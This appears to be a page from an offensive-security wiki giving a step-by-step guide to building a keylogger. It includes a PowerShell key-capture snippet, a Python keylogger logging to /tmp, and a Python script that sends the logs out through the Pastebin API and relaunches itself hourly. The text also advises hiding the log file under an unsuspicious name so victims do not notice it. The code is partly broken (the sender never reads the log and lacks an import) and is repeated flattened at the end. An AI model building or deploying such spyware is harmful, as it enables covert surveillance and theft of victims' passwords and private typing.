Keyloggers

According to Wikipedia:

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard,[1][2] typically covertly, so that a person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program. A keystroke recorder or keylogger can be either software or hardware.

Keyloggers fall under the category of spyware which, as the name suggests, is used to spy on people. To create one, you'll need to keep a couple of things in mind:

If you're storing the keystrokes in a file somewhere on the system, make it so that the file's not suspiciously hanging out in the open where the user can detect it. It should probably be buried deep in the system with a not-so-suspicious-sounding name.
The keystrokes recorded on a system will do no good if you can't see them, so you should set up a channel/medium that can either transmit individual keystrokes to a file on your system and record them, or periodically send the file to your system.

Ok, so let's take this step by step:

Capturing keystrokes

So, there are a lot of ways to capture these, but you first gotta ascertain the target's OS. If that's not possible then you'll just have to create checks in your program to do so.

For windows, you can capture a single key using the following command:

 $PressedKey = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")

Here's a sample output:

PS C:\> $PressedKey
VirtualKeyCode      Character      ControlKeyState      KeyDown
--------------      ---------      ---------------      -------
            65              a            NumLockOn         True

Now, this is all very nice, but we need a continuous capturing of keystrokes and that's to be stored on a file. Each key is associated with a VirtualKeyCode that can be mapped back to said key. You can find information on that here. Once you've mapped this stuff to a hashmap/dictionary, all you gotta do is detect if a key is pressed.

Similarly, on a linux system, each keyboard connected to the system is represented by an input device file in /dev/input/. The files are named in the format eventX, where X is a number that identifies the input device. The first keyboard is usually event0, the second is event1, and so on. You can open them in python with a rb mode and decode keystrokes from that, but we don't wanna implement everything from scratch, so we'll just use a python library to do the detection stuff:

import keyboard

class KeyLogger:
    def __init__(self):
        self.running = False
    
    def start(self):
        self.running = True
        keyboard.on_press(self.handle_key_press)
        keyboard.wait()


    def handle_key_press(self, event):
        f = open("/tmp/klog.log", "a")
        if self.running:
            f.write(event)

        f.close()

if __name__ == "__main__":
    k = KeyLogger()
    k.start()

Transferring Logs

The above is a very basic example of a keylogger and you'd probably need to put on some... flourish on it to make it useable

Next comes the part of transporting the logs over a connection to us. This can be done in several different ways, but for this guide, I'll just use a "dumbass" method to get the logs. Using the pastebin API with yet another python script:

import requests
import pathlib
import time

# PasteBin API endpoint for editing an existing paste
PASTEBIN_API_ENDPOINT = 'https://pastebin.com/api/api_post.php'

# Your Pastebin API key (you can get one from pastebin.com)
API_KEY = '<your pastebin api key>'

# The key of the paste to be edited
paste_key = '<the key of the paste to be edited>'

# The new text to replace the original paste content
new_text = 'This is the new content of the paste.'

# The parameters to be sent to the Pastebin API
params = {
    'api_dev_key': API_KEY,
    'api_option': 'edit',
    'api_paste_key': paste_key,
    'api_paste_code': new_text
}

# Send a POST request to the Pastebin API endpoint
response = requests.post(PASTEBIN_API_ENDPOINT, data=params)

# Check if the edit was successful
while True:
    time.sleep(3600)
    os.system(f"python3 {pathlib.Path(__file__).absolute()}")

All you'll need is the API key from pastebin and a pastebin link's ID (just create a random empty one and get the ID/code from that).

This can then be triggered using a command like:

$ python3 sender.py &

Same for the keylogger:

$ python3 keylogger &

The one we implemented here is a very basic one and probably doesn't work that well. If you wish to see a very nice one written in golang(it's a package btw) for Linux systems, here's an excellent example by @MarinX

Also here's one written in python for windows devices:

PreviousZip Bombs NextWipers

Last updated 1 year ago

PS C:\> $PressedKey VirtualKeyCode Character ControlKeyState KeyDown -------------- --------- --------------- ------- 65 a NumLockOn True

import keyboard class KeyLogger: def __init__(self): self.running = False def start(self): self.running = True keyboard.on_press(self.handle_key_press) keyboard.wait() def handle_key_press(self, event): f = open("/tmp/klog.log", "a") if self.running: f.write(event) f.close() if __name__ == "__main__": k = KeyLogger() k.start()

import requests import pathlib import time # PasteBin API endpoint for editing an existing paste PASTEBIN_API_ENDPOINT = 'https://pastebin.com/api/api_post.php' # Your Pastebin API key (you can get one from pastebin.com) API_KEY = '<your pastebin api key>' # The key of the paste to be edited paste_key = '<the key of the paste to be edited>' # The new text to replace the original paste content new_text = 'This is the new content of the paste.' # The parameters to be sent to the Pastebin API params = { 'api_dev_key': API_KEY, 'api_option': 'edit', 'api_paste_key': paste_key, 'api_paste_code': new_text } # Send a POST request to the Pastebin API endpoint response = requests.post(PASTEBIN_API_ENDPOINT, data=params) # Check if the edit was successful while True: time.sleep(3600) os.system(f"python3 {pathlib.Path(__file__).absolute()}")